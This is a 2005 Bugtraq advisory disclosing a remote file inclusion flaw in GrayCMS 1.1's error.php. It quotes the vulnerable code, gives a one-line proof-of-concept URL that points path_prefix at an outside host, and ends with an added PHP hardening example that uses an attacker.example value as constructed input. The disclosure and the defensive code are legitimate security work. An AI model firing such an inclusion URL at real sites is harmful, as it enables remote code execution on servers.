[38601] in bugtraq


GrayCMS php code injection

daemon@ATHENA.MIT.EDU (Kold)
Tue Apr 26 15:27:20 2005

Date: 26 Apr 2005 11:45:32 -0000
Message-ID: <20050426114532.12588.qmail@www.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Kold <maggik@gala.net>
To: bugtraq@securityfocus.com



Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others
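
Added example, not part of the original post and not GrayCMS code: the snippet above builds its `require` paths from `$path_prefix` without assigning it from a trusted source, so where request parameters become globals (as with PHP's `register_globals`, which the PoC implies but the post does not state) the query string chooses the include base. One way to harden it, using hypothetical helpers `request_sets` and `trusted_prefix` and constructed demo data:

```php
<?php
declare(strict_types=1);
// Added example, not GrayCMS code. Function names and demo values are hypothetical.

/** True if any request source tries to supply a variable the script treats as internal. */
function request_sets(string $name, array ...$sources): bool
{
    foreach ($sources as $src) {
        if (array_key_exists($name, $src)) {
            return true;
        }
    }
    return false;
}

/** Return the canonical include prefix, or throw if $prefix is not the install root. */
function trusted_prefix(string $appRoot, string $scriptDir, string $prefix): string
{
    // URL and stream-wrapper values (http://, ftp://, php://, data:) are never local paths.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $prefix) === 1) {
        throw new RuntimeException('prefix is a URL or stream wrapper');
    }
    $root = realpath($appRoot);
    $resolved = realpath($scriptDir . DIRECTORY_SEPARATOR . $prefix);
    // A relative prefix such as '../' must canonicalise to the install root exactly.
    if ($root === false || $resolved === false || $resolved !== $root) {
        throw new RuntimeException('prefix does not resolve to the application root');
    }
    return $root . DIRECTORY_SEPARATOR;
}

// --- Demo on a constructed directory tree and constructed request data ---
$root = sys_get_temp_dir() . '/gcms_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/code', 0700, true);
$scriptDir = $root . '/code';                           // where error.php would live

$get = ['path_prefix' => 'http://attacker.example/'];   // constructed query string
var_dump(request_sets('path_prefix', $get, [], []));    // a real script would stop here

foreach (['../', 'http://attacker.example/', '../../'] as $p) {
    try {
        echo $p, ' => ', trusted_prefix($root, $scriptDir, $p), PHP_EOL;
    } catch (RuntimeException $e) {
        echo $p, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
rmdir($root . '/code');
rmdir($root);
```

In `php.ini`, `register_globals = Off` and `allow_url_fopen = Off` (plus `allow_url_include = Off` on PHP 5.2 and later) remove the two conditions the PoC depends on.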
